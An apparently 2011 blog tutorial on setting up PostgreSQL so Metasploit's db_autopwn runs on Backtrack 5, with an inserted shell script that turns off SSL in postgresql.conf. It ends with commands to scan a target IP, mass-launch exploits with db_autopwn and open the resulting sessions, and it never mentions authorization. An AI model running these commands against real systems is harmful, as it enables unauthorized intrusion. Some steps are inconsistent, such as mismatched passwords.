
Wednesday, July 6, 2011

Metasploit Autopwn fix for Backtrack 5

A lot of people are having trouble with Metasploit's Autopwn feature in Backtrack 5. It does require a little bit of tweaking to get going; below are a few steps to get you on your way.
I prefer PostgreSQL over MySQL, so this tutorial only shows how to properly configure Autopwn using PostgreSQL.
First you must determine whether PostgreSQL is installed on your system. To do this, type the following into a terminal:
ls /etc/init.d/ | grep post
postgresql

If you do not see "postgresql-8.4" you need to update or install PostgreSQL. This can be done from the repositories:
apt-get install postgresql-8.4 postgresql-client-8.4
Now start the postgreSQL server by typing:
/etc/init.d/postgresql-8.4 start
NOTE: If you receive an error like:
"The PostgreSQL server failed to start. Please check the log output:"
you will need to disable SSL in the config file. To do this, open it in an editor:
nano /etc/postgresql/8.4/main/postgresql.conf
Look for the section like the one below:
Code:
# - Security and Authentication -
#authentication_timeout = 1min # 1s-600s
#ssl = true # (change requires restart)

You simply comment it out like I did above with the "#" sign.
Now restart postgres:
/etc/init.d/postgresql-8.4 start
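As an added example (not from the original post), here is a small shell script that makes the SSL edit from the previous step with sed instead of nano and reports the effective ssl setting before and after, so you can confirm the change took. The config path is an argument so it can be tried on a scratch copy first; the real file on Backtrack 5 is the /etc/postgresql/8.4/main/postgresql.conf named above. The demo snippet inside it is constructed, not copied from a live system.

```shell
#!/bin/sh
# Added example, not from the original post: comment out "ssl = ..." in a
# postgresql.conf the way the post describes, and show the effective value.

# Print the effective ssl value: the last uncommented "ssl = ..." line wins,
# and PostgreSQL defaults to off when no such line is active.
pg_ssl_setting() {
    conf="$1"
    val=$(sed -n 's/^[[:space:]]*ssl[[:space:]]*=[[:space:]]*\([A-Za-z]*\).*/\1/p' "$conf" | tail -n 1)
    if [ -z "$val" ]; then
        echo off
    else
        echo "$val" | tr 'A-Z' 'a-z'
    fi
}

# Comment out every active "ssl = ..." line (the post's manual "#" edit).
# A backup is kept next to the file; lines already commented are left alone.
pg_disable_ssl() {
    conf="$1"
    cp "$conf" "$conf.bak"
    tmp=$(mktemp)
    sed 's/^\([[:space:]]*\)\(ssl[[:space:]]*=\)/\1#\2/' "$conf" > "$tmp" && mv "$tmp" "$conf"
}

if [ $# -eq 0 ]; then
    # No path given: demonstrate on a constructed copy of the relevant section.
    demo_conf=$(mktemp)
    cat > "$demo_conf" <<'EOF'
# - Security and Authentication -
#authentication_timeout = 1min # 1s-600s
ssl = true # (change requires restart)
EOF
    echo "before: ssl = $(pg_ssl_setting "$demo_conf")"
    pg_disable_ssl "$demo_conf"
    echo "after:  ssl = $(pg_ssl_setting "$demo_conf")"
    grep -n 'ssl' "$demo_conf"
    rm -f "$demo_conf" "$demo_conf.bak"
else
    # Path given: act on that file (e.g. /etc/postgresql/8.4/main/postgresql.conf).
    echo "before: ssl = $(pg_ssl_setting "$1")"
    pg_disable_ssl "$1"
    echo "after:  ssl = $(pg_ssl_setting "$1")"
fi
```

Run it with no arguments to see the demonstration, or pass the config path to edit the real file (a .bak copy is left beside it; restart PostgreSQL afterwards as in the step above). Turning ssl off is only reasonable here because the db_connect step later on talks to 127.0.0.1; if the server were reached over the network instead, the postgres password would cross the wire in clear.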
Now connect to the server and change the password to whatever you want:
sudo su postgres -c psql

ALTER USER postgres WITH PASSWORD 'yoursecretpasswd';

(make sure to use the quotation marks when setting your password; here is a real-life example)

ALTER USER postgres WITH PASSWORD 'swordfish';
\q

Now exit psql and set the same password on the postgres system account:
sudo passwd -d postgres
sudo su postgres -c passwd
(Here you want to use the same password you used a few steps back)


PostgreSQL is all set up; now on to Metasploit.
Start Metasploit by typing: msfconsole
Once Metasploit starts, type: db_driver
If the driver is already loaded, the output will say so.
If not, you will need to manually load the driver by typing: db_driver postgresql
db_driver
Now all you have to do is connect to your database by typing (the name after the slash, metasploit here, is the database name):
db_connect postgres:mysecretpassword@127.0.0.1/metasploit

We are now connected and ready to run autopwn.
Run an nmap scan on the target:
db_nmap 192.68.12.99
To see all of autopwn's options, type: db_autopwn
Finally, launch autopwn, then sit back and wait:
db_autopwn -p -t -e -r

After autopwn completes, type:
sessions -l
Any successful attacks will result in a session. To interact with that session, type:
sessions -i 1 (where 1 is the session number)
